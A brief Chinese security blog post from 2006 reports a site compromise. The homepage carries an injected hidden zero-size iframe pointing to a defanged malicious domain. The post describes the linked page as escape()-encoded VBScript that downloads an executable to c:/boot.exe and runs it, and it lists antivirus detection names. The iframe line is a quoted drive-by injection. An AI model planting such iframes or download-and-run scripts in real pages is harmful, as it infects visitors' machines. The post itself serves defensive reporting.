endurer 原创
2006-12-06 第1版
该网站首页末被 加入 代码:
/--------
<iframe src=hxxp://www.z*z***yqr.com/z*l/wm.htm width=0 height=0 frameborder=0></iframe>
--------/
wm.htm 的内容为escape() 加密 的VBscrīpt 脚本 代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 z*l.exe,保存为 c:/boot.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
z*l.exe Kaspersky 报为 Trojan-Downloader.Win32.Delf.ajm, 瑞星 报为Trojan.DL.Multi.wen。